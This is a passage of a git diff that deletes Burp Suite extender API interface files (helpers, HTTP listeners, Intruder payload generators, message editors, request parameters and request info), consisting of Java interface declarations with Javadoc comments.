@param caseSensitive Flags whether or not the search is case-sensitive. - * @param from The offset within - * data where the search should begin. - * @param to The offset within - * data where the search should end. - * @return The offset of the first occurrence of the pattern within the - * specified bounds, or -1 if no match is found. - */ - int indexOf(byte[] data, - byte[] pattern, - boolean caseSensitive, - int from, - int to); - - /** - * This method builds an HTTP message containing the specified headers and - * message body. If applicable, the Content-Length header will be added or - * updated, based on the length of the body. - * - * @param headers A list of headers to include in the message. - * @param body The body of the message, of - * null if the message has an empty body. - * @return The resulting full HTTP message. - */ - byte[] buildHttpMessage(List headers, byte[] body); - - /** - * This method creates a GET request to the specified URL. The headers used - * in the request are determined by the Request headers settings as - * configured in Burp Spider's options. - * - * @param url The URL to which the request should be made. - * @return A request to the specified URL. - */ - byte[] buildHttpRequest(URL url); - - /** - * This method adds a new parameter to an HTTP request, and if appropriate - * updates the Content-Length header. - * - * @param request The request to which the parameter should be added. - * @param parameter An - * IParameter object containing details of the parameter to be - * added. Supported parameter types are: - * PARAM_URL, - * PARAM_BODY and - * PARAM_COOKIE. - * @return A new HTTP request with the new parameter added. - */ - byte[] addParameter(byte[] request, IParameter parameter); - - /** - * This method removes a parameter from an HTTP request, and if appropriate - * updates the Content-Length header. - * - * @param request The request from which the parameter should be removed. - * @param parameter An - * IParameter object containing details of the parameter to be - * removed. Supported parameter types are: - * PARAM_URL, - * PARAM_BODY and - * PARAM_COOKIE. - * @return A new HTTP request with the parameter removed. - */ - byte[] removeParameter(byte[] request, IParameter parameter); - - /** - * This method updates the value of a parameter within an HTTP request, and - * if appropriate updates the Content-Length header. Note: This - * method can only be used to update the value of an existing parameter of a - * specified type. If you need to change the type of an existing parameter, - * you should first call - * removeParameter() to remove the parameter with the old type, - * and then call - * addParameter() to add a parameter with the new type. - * - * @param request The request containing the parameter to be updated. - * @param parameter An - * IParameter object containing details of the parameter to be - * updated. Supported parameter types are: - * PARAM_URL, - * PARAM_BODY and - * PARAM_COOKIE. - * @return A new HTTP request with the parameter updated. - */ - byte[] updateParameter(byte[] request, IParameter parameter); - - /** - * This method can be used to toggle a request's method between GET and - * POST. Parameters are relocated between the URL query string and message - * body as required, and the Content-Length header is created or removed as - * applicable. - * - * @param request The HTTP request whose method should be toggled. - * @return A new HTTP request using the toggled method. - */ - byte[] toggleRequestMethod(byte[] request); - - /** - * This method constructs an - * IHttpService object based on the details provided. - * - * @param host The HTTP service host. - * @param port The HTTP service port. - * @param protocol The HTTP service protocol. - * @return An - * IHttpService object based on the details provided. - */ - IHttpService buildHttpService(String host, int port, String protocol); - - /** - * This method constructs an - * IHttpService object based on the details provided. - * - * @param host The HTTP service host. - * @param port The HTTP service port. - * @param useHttps Flags whether the HTTP service protocol is HTTPS or HTTP. - * @return An - * IHttpService object based on the details provided. - */ - IHttpService buildHttpService(String host, int port, boolean useHttps); - - /** - * This method constructs an - * IParameter object based on the details provided. - * - * @param name The parameter name. - * @param value The parameter value. - * @param type The parameter type, as defined in the - * IParameter interface. - * @return An - * IParameter object based on the details provided. - */ - IParameter buildParameter(String name, String value, byte type); - - /** - * This method constructs an - * IScannerInsertionPoint object based on the details provided. - * It can be used to quickly create a simple insertion point based on a - * fixed payload location within a base request. - * - * @param insertionPointName The name of the insertion point. - * @param baseRequest The request from which to build scan requests. - * @param from The offset of the start of the payload location. - * @param to The offset of the end of the payload location. - * @return An - * IScannerInsertionPoint object based on the details provided. - */ - IScannerInsertionPoint makeScannerInsertionPoint( - String insertionPointName, - byte[] baseRequest, - int from, - int to); -} diff --git a/src/burp/IExtensionStateListener.java b/src/burp/IExtensionStateListener.java deleted file mode 100644 index 9b385f7..0000000 --- a/src/burp/IExtensionStateListener.java +++ /dev/null @@ -1,27 +0,0 @@ -package burp; - -/* - * @(#)IExtensionStateListener.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerExtensionStateListener() to - * register an extension state listener. The listener will be notified of - * changes to the extension's state. Note: Any extensions that start - * background threads or open system resources (such as files or database - * connections) should register a listener and terminate threads / close - * resources when the extension is unloaded. - */ -public interface IExtensionStateListener -{ - /** - * This method is called when the extension is unloaded. - */ - void extensionUnloaded(); -} diff --git a/src/burp/IHttpListener.java b/src/burp/IHttpListener.java deleted file mode 100644 index c1d9a6f..0000000 --- a/src/burp/IHttpListener.java +++ /dev/null @@ -1,37 +0,0 @@ -package burp; - -/* - * @(#)IHttpListener.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerHttpListener() to register an - * HTTP listener. The listener will be notified of requests and responses made - * by any Burp tool. Extensions can perform custom analysis or modification of - * these messages by registering an HTTP listener. - */ -public interface IHttpListener -{ - /** - * This method is invoked when an HTTP request is about to be issued, and - * when an HTTP response has been received. - * - * @param toolFlag A flag indicating the Burp tool that issued the request. - * Burp tool flags are defined in the - * IBurpExtenderCallbacks interface. - * @param messageIsRequest Flags whether the method is being invoked for a - * request or response. - * @param messageInfo Details of the request / response to be processed. - * Extensions can call the setter methods on this object to update the - * current message and so modify Burp's behavior. - */ - void processHttpMessage(int toolFlag, - boolean messageIsRequest, - IHttpRequestResponse messageInfo); -} diff --git a/src/burp/IHttpRequestResponse.java b/src/burp/IHttpRequestResponse.java deleted file mode 100644 index 1a074b8..0000000 --- a/src/burp/IHttpRequestResponse.java +++ /dev/null @@ -1,102 +0,0 @@ -package burp; - -/* - * @(#)IHttpRequestResponse.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to retrieve and update details about HTTP messages. - * - * Note: The setter methods generally can only be used before the message - * has been processed, and not in read-only contexts. The getter methods - * relating to response details can only be used after the request has been - * issued. - */ -public interface IHttpRequestResponse -{ - /** - * This method is used to retrieve the request message. - * - * @return The request message. - */ - byte[] getRequest(); - - /** - * This method is used to update the request message. - * - * @param message The new request message. - */ - void setRequest(byte[] message); - - /** - * This method is used to retrieve the response message. - * - * @return The response message. - */ - byte[] getResponse(); - - /** - * This method is used to update the response message. - * - * @param message The new response message. - */ - void setResponse(byte[] message); - - /** - * This method is used to retrieve the user-annotated comment for this item, - * if applicable. - * - * @return The user-annotated comment for this item, or null if none is set. - */ - String getComment(); - - /** - * This method is used to update the user-annotated comment for this item. - * - * @param comment The comment to be assigned to this item. - */ - void setComment(String comment); - - /** - * This method is used to retrieve the user-annotated highlight for this - * item, if applicable. - * - * @return The user-annotated highlight for this item, or null if none is - * set. - */ - String getHighlight(); - - /** - * This method is used to update the user-annotated highlight for this item. - * - * @param color The highlight color to be assigned to this item. Accepted - * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray, - * or a null String to clear any existing highlight. - */ - void setHighlight(String color); - - /** - * This method is used to retrieve the HTTP service for this request / - * response. - * - * @return An - * IHttpService object containing details of the HTTP service. - */ - IHttpService getHttpService(); - - /** - * This method is used to update the HTTP service for this request / - * response. - * - * @param httpService An - * IHttpService object containing details of the new HTTP - * service. - */ - void setHttpService(IHttpService httpService); - -} diff --git a/src/burp/IHttpRequestResponsePersisted.java b/src/burp/IHttpRequestResponsePersisted.java deleted file mode 100644 index 3c47ad7..0000000 --- a/src/burp/IHttpRequestResponsePersisted.java +++ /dev/null @@ -1,26 +0,0 @@ -package burp; - -/* - * @(#)IHttpRequestResponsePersisted.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used for an - * IHttpRequestResponse object whose request and response messages - * have been saved to temporary files using - * IBurpExtenderCallbacks.saveBuffersToTempFiles(). - */ -public interface IHttpRequestResponsePersisted extends IHttpRequestResponse -{ - /** - * This method is used to permanently delete the saved temporary files. It - * will no longer be possible to retrieve the request or response for this - * item. - */ - void deleteTempFiles(); -} diff --git a/src/burp/IHttpRequestResponseWithMarkers.java b/src/burp/IHttpRequestResponseWithMarkers.java deleted file mode 100644 index 5ddc9ae..0000000 --- a/src/burp/IHttpRequestResponseWithMarkers.java +++ /dev/null @@ -1,44 +0,0 @@ -package burp; - -/* - * @(#)IHttpRequestResponseWithMarkers.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.List; - -/** - * This interface is used for an - * IHttpRequestResponse object that has had markers applied. - * Extensions can create instances of this interface using - * IBurpExtenderCallbacks.applyMarkers(), or provide their own - * implementation. Markers are used in various situations, such as specifying - * Intruder payload positions, Scanner insertion points, and highlights in - * Scanner issues. - */ -public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse -{ - /** - * This method returns the details of the request markers. - * - * @return A list of index pairs representing the offsets of markers for the - * request message. Each item in the list is an int[2] array containing the - * start and end offsets for the marker. The method may return - * null if no request markers are defined. - */ - List getRequestMarkers(); - - /** - * This method returns the details of the response markers. - * - * @return A list of index pairs representing the offsets of markers for the - * response message. Each item in the list is an int[2] array containing the - * start and end offsets for the marker. The method may return - * null if no response markers are defined. - */ - List getResponseMarkers(); -} diff --git a/src/burp/IHttpService.java b/src/burp/IHttpService.java deleted file mode 100644 index 9810d80..0000000 --- a/src/burp/IHttpService.java +++ /dev/null @@ -1,39 +0,0 @@ -package burp; - -/* - * @(#)IHttpService.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to provide details about an HTTP service, to which - * HTTP requests can be sent. - */ -public interface IHttpService -{ - /** - * This method returns the hostname or IP address for the service. - * - * @return The hostname or IP address for the service. - */ - String getHost(); - - /** - * This method returns the port number for the service. - * - * @return The port number for the service. - */ - int getPort(); - - /** - * This method returns the protocol for the service. - * - * @return The protocol for the service. Expected values are "http" or - * "https". - */ - String getProtocol(); -} diff --git a/src/burp/IInterceptedProxyMessage.java b/src/burp/IInterceptedProxyMessage.java deleted file mode 100644 index bf6f47f..0000000 --- a/src/burp/IInterceptedProxyMessage.java +++ /dev/null @@ -1,116 +0,0 @@ -package burp; - -/* - * @(#)IInterceptedProxyMessage.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.net.InetAddress; - -/** - * This interface is used to represent an HTTP message that has been intercepted - * by Burp Proxy. Extensions can register an - * IProxyListener to receive details of proxy messages using this - * interface. * - */ -public interface IInterceptedProxyMessage -{ - /** - * This action causes Burp Proxy to follow the current interception rules to - * determine the appropriate action to take for the message. - */ - static final int ACTION_FOLLOW_RULES = 0; - /** - * This action causes Burp Proxy to present the message to the user for - * manual review or modification. - */ - static final int ACTION_DO_INTERCEPT = 1; - /** - * This action causes Burp Proxy to forward the message to the remote server - * or client, without presenting it to the user. - */ - static final int ACTION_DONT_INTERCEPT = 2; - /** - * This action causes Burp Proxy to drop the message. - */ - static final int ACTION_DROP = 3; - /** - * This action causes Burp Proxy to follow the current interception rules to - * determine the appropriate action to take for the message, and then make a - * second call to processProxyMessage. - */ - static final int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10; - /** - * This action causes Burp Proxy to present the message to the user for - * manual review or modification, and then make a second call to - * processProxyMessage. - */ - static final int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11; - /** - * This action causes Burp Proxy to skip user interception, and then make a - * second call to processProxyMessage. - */ - static final int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12; - - /** - * This method retrieves a unique reference number for this - * request/response. - * - * @return An identifier that is unique to a single request/response pair. - * Extensions can use this to correlate details of requests and responses - * and perform processing on the response message accordingly. - */ - int getMessageReference(); - - /** - * This method retrieves details of the intercepted message. - * - * @return An IHttpRequestResponse object containing details of - * the intercepted message. - */ - IHttpRequestResponse getMessageInfo(); - - /** - * This method retrieves the currently defined interception action. The - * default action is - * ACTION_FOLLOW_RULES. If multiple proxy listeners are - * registered, then other listeners may already have modified the - * interception action before it reaches the current listener. This method - * can be used to determine whether this has occurred. - * - * @return The currently defined interception action. Possible values are - * defined within this interface. - */ - int getInterceptAction(); - - /** - * This method is used to update the interception action. - * - * @param interceptAction The new interception action. Possible values are - * defined within this interface. - */ - void setInterceptAction(int interceptAction); - - /** - * This method retrieves the name of the Burp Proxy listener that is - * processing the intercepted message. - * - * @return The name of the Burp Proxy listener that is processing the - * intercepted message. The format is the same as that shown in the Proxy - * Listeners UI - for example, "127.0.0.1:8080". - */ - String getListenerInterface(); - - /** - * This method retrieves the client IP address from which the request for - * the intercepted message was received. - * - * @return The client IP address from which the request for the intercepted - * message was received. - */ - InetAddress getClientIpAddress(); -} diff --git a/src/burp/IIntruderAttack.java b/src/burp/IIntruderAttack.java deleted file mode 100644 index 8305fbb..0000000 --- a/src/burp/IIntruderAttack.java +++ /dev/null @@ -1,31 +0,0 @@ -package burp; - -/* - * @(#)IIntruderAttack.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to hold details about an Intruder attack. - */ -public interface IIntruderAttack -{ - /** - * This method is used to retrieve the HTTP service for the attack. - * - * @return The HTTP service for the attack. - */ - IHttpService getHttpService(); - - /** - * This method is used to retrieve the request template for the attack. - * - * @return The request template for the attack. - */ - byte[] getRequestTemplate(); - -} diff --git a/src/burp/IIntruderPayloadGenerator.java b/src/burp/IIntruderPayloadGenerator.java deleted file mode 100644 index ba28643..0000000 --- a/src/burp/IIntruderPayloadGenerator.java +++ /dev/null @@ -1,50 +0,0 @@ -package burp; - -/* - * @(#)IIntruderPayloadGenerator.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used for custom Intruder payload generators. Extensions - * that have registered an - * IIntruderPayloadGeneratorFactory must return a new instance of - * this interface when required as part of a new Intruder attack. - */ -public interface IIntruderPayloadGenerator -{ - /** - * This method is used by Burp to determine whether the payload generator is - * able to provide any further payloads. - * - * @return Extensions should return - * false when all the available payloads have been used up, - * otherwise - * true. - */ - boolean hasMorePayloads(); - - /** - * This method is used by Burp to obtain the value of the next payload. - * - * @param baseValue The base value of the current payload position. This - * value may be - * null if the concept of a base value is not applicable (e.g. - * in a battering ram attack). - * @return The next payload to use in the attack. - */ - byte[] getNextPayload(byte[] baseValue); - - /** - * This method is used by Burp to reset the state of the payload generator - * so that the next call to - * getNextPayload() returns the first payload again. This - * method will be invoked when an attack uses the same payload generator for - * more than one payload position, for example in a sniper attack. - */ - void reset(); -} diff --git a/src/burp/IIntruderPayloadGeneratorFactory.java b/src/burp/IIntruderPayloadGeneratorFactory.java deleted file mode 100644 index 2386306..0000000 --- a/src/burp/IIntruderPayloadGeneratorFactory.java +++ /dev/null @@ -1,40 +0,0 @@ -package burp; - -/* - * @(#)IIntruderPayloadGeneratorFactory.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory() - * to register a factory for custom Intruder payloads. - */ -public interface IIntruderPayloadGeneratorFactory -{ - /** - * This method is used by Burp to obtain the name of the payload generator. - * This will be displayed as an option within the Intruder UI when the user - * selects to use extension-generated payloads. - * - * @return The name of the payload generator. - */ - String getGeneratorName(); - - /** - * This method is used by Burp when the user starts an Intruder attack that - * uses this payload generator. - * - * @param attack An - * IIntruderAttack object that can be queried to obtain details - * about the attack in which the payload generator will be used. - * @return A new instance of - * IIntruderPayloadGenerator that will be used to generate - * payloads for the attack. - */ - IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack); -} diff --git a/src/burp/IIntruderPayloadProcessor.java b/src/burp/IIntruderPayloadProcessor.java deleted file mode 100644 index 56d7fea..0000000 --- a/src/burp/IIntruderPayloadProcessor.java +++ /dev/null @@ -1,45 +0,0 @@ -package burp; - -/* - * @(#)IIntruderPayloadProcessor.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to - * register a custom Intruder payload processor. - */ -public interface IIntruderPayloadProcessor -{ - /** - * This method is used by Burp to obtain the name of the payload processor. - * This will be displayed as an option within the Intruder UI when the user - * selects to use an extension-provided payload processor. - * - * @return The name of the payload processor. - */ - String getProcessorName(); - - /** - * This method is invoked by Burp each time the processor should be applied - * to an Intruder payload. - * - * @param currentPayload The value of the payload to be processed. - * @param originalPayload The value of the original payload prior to - * processing by any already-applied processing rules. - * @param baseValue The base value of the payload position, which will be - * replaced with the current payload. - * @return The value of the processed payload. This may be - * null to indicate that the current payload should be skipped, - * and the attack will move directly to the next payload. - */ - byte[] processPayload( - byte[] currentPayload, - byte[] originalPayload, - byte[] baseValue); -} diff --git a/src/burp/IMenuItemHandler.java b/src/burp/IMenuItemHandler.java deleted file mode 100644 index d769b8c..0000000 --- a/src/burp/IMenuItemHandler.java +++ /dev/null @@ -1,36 +0,0 @@ -package burp; - -/* - * @(#)IMenuItemHandler.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerMenuItem() to register a custom - * context menu item. - * - * @deprecated Use - * IContextMenuFactory instead. - */ -@Deprecated -public interface IMenuItemHandler -{ - /** - * This method is invoked by Burp Suite when the user clicks on a custom - * menu item which the extension has registered with Burp. - * - * @param menuItemCaption The caption of the menu item which was clicked. - * This parameter enables extensions to provide a single implementation - * which handles multiple different menu items. - * @param messageInfo Details of the HTTP message(s) for which the context - * menu was displayed. - */ - void menuItemClicked( - String menuItemCaption, - IHttpRequestResponse[] messageInfo); -} diff --git a/src/burp/IMessageEditor.java b/src/burp/IMessageEditor.java deleted file mode 100644 index 4b6ccb3..0000000 --- a/src/burp/IMessageEditor.java +++ /dev/null @@ -1,64 +0,0 @@ -package burp; - -/* - * @(#)IMessageEditor.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.Component; - -/** - * This interface is used to provide extensions with an instance of Burp's HTTP - * message editor, for the extension to use in its own UI. Extensions should - * call - * IBurpExtenderCallbacks.createMessageEditor() to obtain an - * instance of this interface. - */ -public interface IMessageEditor -{ - /** - * This method returns the UI component of the editor, for extensions to add - * to their own UI. - * - * @return The UI component of the editor. - */ - Component getComponent(); - - /** - * This method is used to display an HTTP message in the editor. - * - * @param message The HTTP message to be displayed. - * @param isRequest Flags whether the message is an HTTP request or - * response. - */ - void setMessage(byte[] message, boolean isRequest); - - /** - * This method is used to retrieve the currently displayed message, which - * may have been modified by the user. - * - * @return The currently displayed HTTP message. - */ - byte[] getMessage(); - - /** - * This method is used to determine whether the current message has been - * modified by the user. - * - * @return An indication of whether the current message has been modified by - * the user since it was first displayed. - */ - boolean isMessageModified(); - - /** - * This method returns the data that is currently selected by the user. - * - * @return The data that is currently selected by the user, or - * null if no selection is made. - */ - byte[] getSelectedData(); -} diff --git a/src/burp/IMessageEditorController.java b/src/burp/IMessageEditorController.java deleted file mode 100644 index 99f5851..0000000 --- a/src/burp/IMessageEditorController.java +++ /dev/null @@ -1,49 +0,0 @@ -package burp; - -/* - * @(#)IMessageEditorController.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used by an - * IMessageEditor to obtain details about the currently displayed - * message. Extensions that create instances of Burp's HTTP message editor can - * optionally provide an implementation of - * IMessageEditorController, which the editor will invoke when it - * requires further information about the current message (for example, to send - * it to another Burp tool). Extensions that provide custom editor tabs via an - * IMessageEditorTabFactory will receive a reference to an - * IMessageEditorController object for each tab instance they - * generate, which the tab can invoke if it requires further information about - * the current message. - */ -public interface IMessageEditorController -{ - /** - * This method is used to retrieve the HTTP service for the current message. - * - * @return The HTTP service for the current message. - */ - IHttpService getHttpService(); - - /** - * This method is used to retrieve the HTTP request associated with the - * current message (which may itself be a response). - * - * @return The HTTP request associated with the current message. - */ - byte[] getRequest(); - - /** - * This method is used to retrieve the HTTP response associated with the - * current message (which may itself be a request). - * - * @return The HTTP response associated with the current message. - */ - byte[] getResponse(); -} diff --git a/src/burp/IMessageEditorTab.java b/src/burp/IMessageEditorTab.java deleted file mode 100644 index 0b95dae..0000000 --- a/src/burp/IMessageEditorTab.java +++ /dev/null @@ -1,102 +0,0 @@ -package burp; - -/* - * @(#)IMessageEditorTab.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.Component; - -/** - * Extensions that register an - * IMessageEditorTabFactory must return instances of this - * interface, which Burp will use to create custom tabs within its HTTP message - * editors. - */ -public interface IMessageEditorTab -{ - /** - * This method returns the caption that should appear on the custom tab when - * it is displayed. Note: Burp invokes this method once when the tab - * is first generated, and the same caption will be used every time the tab - * is displayed. - * - * @return The caption that should appear on the custom tab when it is - * displayed. - */ - String getTabCaption(); - - /** - * This method returns the component that should be used as the contents of - * the custom tab when it is displayed. Note: Burp invokes this - * method once when the tab is first generated, and the same component will - * be used every time the tab is displayed. - * - * @return The component that should be used as the contents of the custom - * tab when it is displayed. - */ - Component getUiComponent(); - - /** - * The hosting editor will invoke this method before it displays a new HTTP - * message, so that the custom tab can indicate whether it should be enabled - * for that message. - * - * @param content The message that is about to be displayed. - * @param isRequest Indicates whether the message is a request or a - * response. - * @return The method should return - * true if the custom tab is able to handle the specified - * message, and so will be displayed within the editor. Otherwise, the tab - * will be hidden while this message is displayed. - */ - boolean isEnabled(byte[] content, boolean isRequest); - - /** - * The hosting editor will invoke this method to display a new message or to - * clear the existing message. This method will only be called with a new - * message if the tab has already returned - * true to a call to - * isEnabled() with the same message details. - * - * @param content The message that is to be displayed, or - * null if the tab should clear its contents and disable any - * editable controls. - * @param isRequest Indicates whether the message is a request or a - * response. - */ - void setMessage(byte[] content, boolean isRequest); - - /** - * This method returns the currently displayed message. - * - * @return The currently displayed message. - */ - byte[] getMessage(); - - /** - * This method is used to determine whether the currently displayed message - * has been modified by the user. The hosting editor will always call - * getMessage() before calling this method, so any pending - * edits should be completed within - * getMessage(). - * - * @return The method should return - * true if the user has modified the current message since it - * was first displayed. - */ - boolean isModified(); - - /** - * This method is used to retrieve the data that is currently selected by - * the user. - * - * @return The data that is currently selected by the user. This may be - * null if no selection is currently made. - */ - byte[] getSelectedData(); -} diff --git a/src/burp/IMessageEditorTabFactory.java b/src/burp/IMessageEditorTabFactory.java deleted file mode 100644 index afc1200..0000000 --- a/src/burp/IMessageEditorTabFactory.java +++ /dev/null @@ -1,38 +0,0 @@ -package burp; - -/* - * @(#)IMessageEditorTabFactory.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerMessageEditorTabFactory() to - * register a factory for custom message editor tabs. This allows extensions to - * provide custom rendering or editing of HTTP messages, within Burp's own HTTP - * editor. - */ -public interface IMessageEditorTabFactory -{ - /** - * Burp will call this method once for each HTTP message editor, and the - * factory should provide a new instance of an - * IMessageEditorTab object. - * - * @param controller An - * IMessageEditorController object, which the new tab can query - * to retrieve details about the currently displayed message. This may be - * null for extension-invoked message editors where the - * extension has not provided an editor controller. - * @param editable Indicates whether the hosting editor is editable or - * read-only. - * @return A new - * IMessageEditorTab object for use within the message editor. - */ - IMessageEditorTab createNewInstance(IMessageEditorController controller, - boolean editable); -} diff --git a/src/burp/IParameter.java b/src/burp/IParameter.java deleted file mode 100644 index f62d609..0000000 --- a/src/burp/IParameter.java +++ /dev/null @@ -1,104 +0,0 @@ -package burp; - -/* - * @(#)IParameter.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to hold details about an HTTP request parameter. - */ -public interface IParameter -{ - /** - * Used to indicate a parameter within the URL query string. - */ - static final byte PARAM_URL = 0; - /** - * Used to indicate a parameter within the message body. - */ - static final byte PARAM_BODY = 1; - /** - * Used to indicate an HTTP cookie. - */ - static final byte PARAM_COOKIE = 2; - /** - * Used to indicate an item of data within an XML structure. - */ - static final byte PARAM_XML = 3; - /** - * Used to indicate the value of a tag attribute within an XML structure. - */ - static final byte PARAM_XML_ATTR = 4; - /** - * Used to indicate the value of a parameter attribute within a multi-part - * message body (such as the name of an uploaded file). - */ - static final byte PARAM_MULTIPART_ATTR = 5; - /** - * Used to indicate an item of data within a JSON structure. - */ - static final byte PARAM_JSON = 6; - - /** - * This method is used to retrieve the parameter type. - * - * @return The parameter type. The available types are defined within this - * interface. - */ - byte getType(); - - /** - * This method is used to retrieve the parameter name. - * - * @return The parameter name. - */ - String getName(); - - /** - * This method is used to retrieve the parameter value. - * - * @return The parameter value. - */ - String getValue(); - - /** - * This method is used to retrieve the start offset of the parameter name - * within the HTTP request. - * - * @return The start offset of the parameter name within the HTTP request, - * or -1 if the parameter is not associated with a specific request. - */ - int getNameStart(); - - /** - * This method is used to retrieve the end offset of the parameter name - * within the HTTP request. - * - * @return The end offset of the parameter name within the HTTP request, or - * -1 if the parameter is not associated with a specific request. - */ - int getNameEnd(); - - /** - * This method is used to retrieve the start offset of the parameter value - * within the HTTP request. - * - * @return The start offset of the parameter value within the HTTP request, - * or -1 if the parameter is not associated with a specific request. - */ - int getValueStart(); - - /** - * This method is used to retrieve the end offset of the parameter value - * within the HTTP request. - * - * @return The end offset of the parameter value within the HTTP request, or - * -1 if the parameter is not associated with a specific request. - */ - int getValueEnd(); -} diff --git a/src/burp/IProxyListener.java b/src/burp/IProxyListener.java deleted file mode 100644 index e032a9d..0000000 --- a/src/burp/IProxyListener.java +++ /dev/null @@ -1,37 +0,0 @@ -package burp; - -/* - * @(#)IProxyListener.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerProxyListener() to register a - * Proxy listener. The listener will be notified of requests and responses being - * processed by the Proxy tool. Extensions can perform custom analysis or - * modification of these messages, and control in-UI message interception, by - * registering a proxy listener. - */ -public interface IProxyListener -{ - /** - * This method is invoked when an HTTP message is being processed by the - * Proxy. - * - * @param messageIsRequest Indicates whether the HTTP message is a request - * or a response. - * @param message An - * IInterceptedProxyMessage object that extensions can use to - * query and update details of the message, and control whether the message - * should be intercepted and displayed to the user for manual review or - * modification. - */ - void processProxyMessage( - boolean messageIsRequest, - IInterceptedProxyMessage message); -} diff --git a/src/burp/IRequestInfo.java b/src/burp/IRequestInfo.java deleted file mode 100644 index 1ae8f9c..0000000 --- a/src/burp/IRequestInfo.java +++ /dev/null @@ -1,95 +0,0 @@ -package burp; - -/* - * @(#)IRequestInfo.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.net.URL; -import java.util.List; - -/** - * This interface is used to retrieve key details about an HTTP request. - * Extensions can obtain an - * IRequestInfo object for a given request by calling - * IExtensionHelpers.analyzeRequest(). - */ -public interface IRequestInfo -{ - /** - * Used to indicate that there is no content. - */ - static final byte CONTENT_TYPE_NONE = 0; - /** - * Used to indicate URL-encoded content. - */ - static final byte CONTENT_TYPE_URL_ENCODED = 1; - /** - * Used to indicate multi-part content. - */ - static final byte CONTENT_TYPE_MULTIPART = 2; - /** - * Used to indicate XML content. - */ - static final byte CONTENT_TYPE_XML = 3; - /** - * Used to indicate JSON content. - */ - static final byte CONTENT_TYPE_JSON = 4; - /** - * Used to indicate AMF content. - */ - static final byte CONTENT_TYPE_AMF = 5; - /** - * Used to indicate unknown content. - */ - static final byte CONTENT_TYPE_UNKNOWN = -1; - - /** - * This method is used to obtain the HTTP method used in the request. - * - * @return The HTTP method used in the request. - */ - String getMethod(); - - /** - * This method is used to obtain the URL in the request. - * - * @return The URL in the request. - */ - URL getUrl(); - - /** - * This method is used to obtain the HTTP headers contained in the request. - * - * @return The HTTP headers contained in the request. - */ - List getHeaders(); - - /** - * This method is used to obtain the parameters contained in the request. - * - * @return The parameters contained in the request. - */ - List getParameters(); - - /** - * This method is used to obtain the offset within the request where the - * message body begins. - * - * @return The offset within the request where the message body begins. - */ - int getBodyOffset(); - - /** - * This method is used 